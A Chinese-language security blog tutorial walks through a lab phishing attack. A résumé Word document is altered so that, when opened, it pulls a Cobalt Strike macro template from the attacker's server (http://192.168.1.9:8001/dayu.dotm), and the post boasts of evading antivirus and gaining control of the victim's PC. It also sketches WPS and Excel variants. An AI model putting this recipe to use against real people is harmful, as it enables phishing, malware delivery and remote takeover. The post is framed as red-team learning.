渗透地基钓鱼篇-Word文档注入执行恶意宏

  • A+
所属分类:安全文章
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。


授权转载,文章来源:“大余xiyou” 博客


0x01 前言

网络钓鱼是社会工程学攻击方式之一,主要是通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗、伤害等危害手段!


网络钓鱼攻击是个人和公司在保护其信息安全方面面临的最常见的安全挑战之一。无论是获取密码、信用卡还是其他敏感信息,黑客都在使用电子邮件、社交媒体、电话和任何可能的通信方式窃取有价值的数据。


网络钓鱼攻击的兴起对所有组织都构成了重大威胁。重要的是,如果他们要保护自己的信息,所有组织都应该知道如何发现一些最常见的网络钓鱼骗局。同样还要熟悉攻击者用来实施这些骗局的一些最常见的技术类型。


这篇主要演示如何创建Word文档进行钓鱼,并控制对方,该方法也是红队常用的钓鱼方式之一,利用的是分离免杀!最后还会写一点思路!


0x02 环境介绍

黑客(攻击者):

IP:192.168.1.9

系统:kali.2020.4


VPS服务器:

目前演示是用kali来架设做VPS公网服务器的!道理意义一样!


办公电脑:

系统:windwos10

IP:192.168.1.208

渗透地基钓鱼篇-Word文档注入执行恶意宏

目前kali上运行了Cobalt strike ,攻击者在自己的公网VPS服务器上制作了后门word文档,并上传上去作为钓鱼用,办公电脑收到对方邮件或者各种手段发送的word后门文档,最终黑客控制办公电脑的过程!!

0x03 Word文档注入后门宏演示

1、创建基础文档

在桌面基础创建文档名称:dayu.docx

渗透地基钓鱼篇-Word文档注入执行恶意宏

2、开发工具
大部分办公都不需要开发环境工具,所以在word文档栏目中是没有开发工具这项栏目的,需要在这里打开即可!!
渗透地基钓鱼篇-Word文档注入执行恶意宏
渗透地基钓鱼篇-Word文档注入执行恶意宏

3、CS创建office后门
这里CS在前面已经讲得很详细了,不懂的往前看看文章!Attacks-MS office Macro进入!
渗透地基钓鱼篇-Word文档注入执行恶意宏

选择监听!点击Generate!
渗透地基钓鱼篇-Word文档注入执行恶意宏

生成宏后门,点击复制!
渗透地基钓鱼篇-Word文档注入执行恶意宏

4、插入后门代码
点击开发工具后,双击打开ThisDocument后出现编辑框!将刚复制好的CS后门代码复制进入!
渗透地基钓鱼篇-Word文档注入执行恶意宏

右上角选择Auto_Open,简单理解就是自动打开的意思!就是对方在打开word文档时,簿会自动运行宏提示信息,是否点击,点击就抓取到了shell!!
渗透地基钓鱼篇-Word文档注入执行恶意宏

Ctrl+S保存后,会提示,点击否即可!
渗透地基钓鱼篇-Word文档注入执行恶意宏

选择保存类型:*.dotm…(为什么选择dotm,往下看就晓得了~)

渗透地基钓鱼篇-Word文档注入执行恶意宏


保存后提示报毒了!!未做任何免杀的!!继续…
渗透地基钓鱼篇-Word文档注入执行恶意宏

目前桌面上有两个文件,一个宏,一个docx…(为了讲得更细致步骤就细化了)
渗透地基钓鱼篇-Word文档注入执行恶意宏

5、简单测试

这里简单测试,是测试CS生成的shell和本机是互联的,确保能拿到对方控制权限!


右键点打开!(必须右键点打开!)

渗透地基钓鱼篇-Word文档注入执行恶意宏

提示宏已禁用,点击启用内容!
渗透地基钓鱼篇-Word文档注入执行恶意宏

正常上线!说明没问题,那么接下来继续!!
渗透地基钓鱼篇-Word文档注入执行恶意宏

6、上传后门宏

将后门宏文件dayu.dotm上传到公网服务器中(这里用kali进行模拟)

渗透地基钓鱼篇-Word文档注入执行恶意宏

7、新建word文档

目前文档类型非常多,我已简历为主!这里创建一个简历模版保存到桌面即可!

渗透地基钓鱼篇-Word文档注入执行恶意宏

8、修改文件名

修改文件名:docx改为zip类型!!

渗透地基钓鱼篇-Word文档注入执行恶意宏

9、修改宏内容

将zip文件解压,进入/word/_rels目录下,打开settings.xml.rels宏文件,这段就是宏需要执行的代码…!

file:///C:UsersyujunAppDataRoamingMicrosoftTemplates精美简历,由%20MOO%20设计.dotx

渗透地基钓鱼篇-Word文档注入执行恶意宏

将该段代码修改为以下内容,意思就是执行开启宏后,会执行访问下载服务器上的dotm宏文件并执行!!
http://192.168.1.9:8001/dayu.dotm
渗透地基钓鱼篇-Word文档注入执行恶意宏

然后将内容重新压缩后,在修改zip为docx类型,修改后可看到就是我的简历了!

渗透地基钓鱼篇-Word文档注入执行恶意宏


这里利用的是分离免杀的方法,里面的代码都是正常的,由于杀毒软件是静态查杀,所以无法查杀的!


10、下载并执行

可看到通过下载该简历文件,微软、360、火绒都是不查杀的!

渗透地基钓鱼篇-Word文档注入执行恶意宏

出于好奇心,打开文档,提示:
该工程中的宏被禁止,请...........是否激活...

那么安全意识强的肯定是点X,安全意识差的,点确定,都没关系!钓鱼嘛,主要钓鱼安全意识差,又不懂安全的人,社会太多太多了~~所以要加强安全意识啊!


这里点击确定或者关闭点X关掉该框框,都意义不大,主要的意思是提醒用户,左上角可以启用内容!!!使用宏!!!正常浏览简历!!!


那么左上角还有个安全警告,点击启用内容!!


11、成功控制

可看到成功获得办公电脑192.168.1.208的控制权限!!

渗透地基钓鱼篇-Word文档注入执行恶意宏
渗透地基钓鱼篇-Word文档注入执行恶意宏


0x04 另外思路

如果是遇到WPS的客户怎么办?通过上面的方法WPS打开我的简历是不会提示宏的!我这只提供思路,因为现在群体用WPS非常的多,就不会写出来了!


另外思路:

1. 打开WPS创建宏是暗色的需要安装VBA for WPS才可以写WPS宏病毒代码执行!2. Office和WPS中还可以隐藏文字,可以利用该方式通过配合录制宏的方法,用该方式执行…3. Normal模块下,不止能编写一个settings.xml.rels…可以多宏…4. 弹框执行代码写入宏,那么Excel、PPT等也写…5. 不止docx宏,还有很多,能另存文件内容的都可以…


还有前面也提了混淆,就到这里,不在往下说了…提高安全意识吧~~


今天基础牢固就到这里,虽然基础,但是必须牢记于心。




只需关注公众号并回复“9527”即可获取一套HTB靶场学习文档和视频,1120”获取安全参考等安全杂志PDF电子版,1208”获取个人常用高效爆破字典0221”获取2020年酒仙桥文章打包还在等什么?赶紧关注学习吧!


推 荐 阅 读




渗透地基钓鱼篇-Word文档注入执行恶意宏
渗透地基钓鱼篇-Word文档注入执行恶意宏
渗透地基钓鱼篇-Word文档注入执行恶意宏

欢 迎 私 下 骚 扰



渗透地基钓鱼篇-Word文档注入执行恶意宏

本文始发于微信公众号(潇湘信安):渗透地基钓鱼篇-Word文档注入执行恶意宏

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: